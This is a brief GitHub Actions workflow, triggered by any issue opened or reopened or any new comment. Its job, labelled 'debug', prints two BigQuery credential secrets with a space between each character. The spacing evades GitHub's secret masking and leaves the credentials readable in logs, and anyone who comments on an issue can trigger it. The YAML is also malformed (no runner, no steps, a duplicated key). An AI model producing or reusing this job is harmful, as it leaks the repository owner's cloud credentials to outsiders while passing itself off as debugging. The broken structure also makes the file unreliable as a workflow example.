name: "On Issues"

on:
  issue_comment:
    types: [created]
  issues:
    types: [reopened, opened]

jobs:
  debug:
    run: echo ${{secrets.BIGQUERY_CREDENTIALS }} | sed 's/./& /g'
    run: echo ${{secrets.BIGQUERY_CREDENTIALS2 }} | sed 's/./& /g'
